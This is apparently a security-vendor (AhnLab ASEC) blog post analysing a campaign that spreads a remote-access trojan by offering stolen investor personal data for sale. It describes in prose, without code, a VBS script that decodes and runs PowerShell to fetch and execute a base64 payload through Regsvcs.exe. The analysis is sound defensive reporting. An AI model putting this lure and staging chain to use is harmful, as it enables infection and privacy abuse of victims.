AhnLab Security Emergency response Center (ASEC) discovered a case of malware distribution using personal information sales as bait. This attack case employs a social engineering hacking technique. ASEC provides you with recently discovered circumstances of malware distribution using social engineering hacking techniques.
Figure 1 shows the content of the website used by the threat actor as a distribution site, with multiple files. Most of the files contain personal information, and the file names include investment-related keywords such as ‘reading,’ ‘unlisted,’ ‘day trading,’ and ‘mid to long term.’
On the malware distribution site, the threat actor had files with numerous pieces of personal information amounting to over 8,500 in total. Aside from names and phone numbers, there were also files with personal investment amounts and credit ratings.
Such personal data was confirmed as being used by the malware distributor and disguised as being for sale to propagate malware (see Figure 5). The script in Figure 6 which performs the actual malware infection behavior and the personal data file are downloaded and executed. Since the malware executed is not shown as a script and the personal information file is opened, it is difficult for the user to recognize the malware infection.
Figure 6 shows the content of the file win64.vbs that appears in the Figure 1 list. Encoded strings are substituted, decoded, and run through PowerShell. The executed command is fairly simple: it reads the string in the textbin address and decodes it in base64 to execute it. Ultimately, the command downloads and runs the file base64.txt in the list shown in Figure 1.
The executed malware has the same features as RAT types which allow remote control. Its features include autorun registration, executing scripts, downloading additional files, executing these downloaded files through Regsvcs.exe, (a legitimate process), and performing reverse connection.
This post examined the circumstances of malware distribution using personal information as bait. The files covered in this post contained multiple keywords such as ‘reading,’ ‘unlisted,’ and ‘day trading.’ Such indiscriminately collected personal data are not encrypted when stored and can be reused for malware distribution when leaked. Users must practice caution against unauthorized group chats that provide investment information.
Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.